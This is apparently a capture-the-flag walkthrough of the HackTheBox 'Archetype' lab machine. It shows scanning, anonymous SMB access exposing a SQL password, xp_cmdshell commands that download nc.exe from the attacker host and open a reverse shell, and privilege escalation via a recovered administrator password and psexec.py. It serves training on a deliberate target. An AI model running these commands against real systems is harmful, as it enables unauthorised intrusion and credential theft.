ArcheType CTF – HTB
Table Of Contents
Enumeration
In the enumeration stage I start off by doing an NMAP scan.
sudo nmap -sV -A -p- --script vuln 10.10.10.27 -oN nmap.result
--------------------------------------------------------------
Nmap scan report for 10.10.10.27
Host is up (0.062s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
|_sslv2-drown:
| vulners:
| cpe:/a:microsoft:sql_server:2017:
| CVE-2007-5090 7.5 https://vulners.com/cve/CVE-2007-5090
| CVE-2021-1636 6.5 https://vulners.com/cve/CVE-2021-1636
| CVE-2019-1068 6.5 https://vulners.com/cve/CVE-2019-1068
|_ CVE-2019-0819 4.0 https://vulners.com/cve/CVE-2019-0819
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
There are a couple of interesting ports open, among other things port 445 (SMB) and 1433 (mssql).
I’ll run ‘enum4linux’ against the server. The interesting take from that scan was that it dosent require username or password to connect to SMB.
enum4linux -H 10.10.10.27
-----------------------------
====================================
| Session Check on 10.10.10.27 |
====================================
[+] Server 10.10.10.27 allows sessions using username '', password ''
[+] Got domain/workgroup name:
We’ll try and connect to SMB using ‘smbclient’.
smbclient -L //10.10.10.27
--------------------------
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
------------------------------
# Connect to backups
smbclient //10.10.10.27/backups
smb: \> ls
. D 0 Mon Jan 20 12:20:57 2020
.. D 0 Mon Jan 20 12:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 12:23:02 2020
10328063 blocks of size 4096. 8248445 blocks available
smb: \> get prod.dtsConfig
-----------------------
cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
Gain access
I found a username and a password. I will use those creds to try and connect to mssql. Using impackts ‘mssqlclient.py’ to connect to mssql.
mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation
Password:
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
From the help menu I can see that I can execute arbitrary commands on the SQL server. I’ll use int0x33‘s ‘nc.exe’, send this to the target machine, and try and get a reverse shell.
# Terminal 1 attacker - in the same dir as nc.exe
sudo python3 -m http.server 8080
# Terminal 2 target SQL
SQL> enable_xp_cmdshell
SQL> reconfigure
SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/nc.exe -OutFile %temp%/nc.exe"
output
--------------------------------------------------------------------------------
NULL
# Terminal 1 attacker - nc.exe is sent from attacker to target
10.10.10.27 - - [17/Jun/2021 07:59:41] "GET /nc.exe HTTP/1.1" 200 -
# Terminal 3 attacker
sudo rlwrap nc -nlvp 443
listening on [any] 443 ...
# Terminal 2 target SQL
SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.14.117 443 -e cmd.exe"
# Target 3 attacker - reverse shell
connect to [10.10.14.117] from (UNKNOWN) [10.10.10.27] 49716
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
archetype\sql_svc
rlwrap gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell.
PrivSec
Using carlospolop’s winPEAS.bat we can find possible privsec vectors. Its an amazing tool that you should have in your toolbox. Its available for Linux aswell.
We’ll send the ‘winPEAS.bat’ to the target using http.server.
SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/winPEASbat -OutFile %temp%/winpeas.bat"
# From the reverse shell
C:\Users\sql_svc> cd %temp%
C:\Users\sql_svc\AppData\Local\Temp>winpeas.bat This will run the winpeas.bat, and it takes a while to run. From the winpeas.bat we find an interesting file ‘C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine’. From the file we find the password for ‘administrator’ , which is ‘MEGACORP_4dm1n!!’. Using that info, we can use impackts psexec.py to login to administrator and get the root flag.
psexec.py administrator@10.10.10.27
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file FfeDRNaS.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service qkmG on 10.10.10.27.....
[*] Starting service qkmG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Users\Administrator>cd Desktop
C:\Users\Administrator>dir
Directory of C:\Users\Administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,822,023,680 bytes free
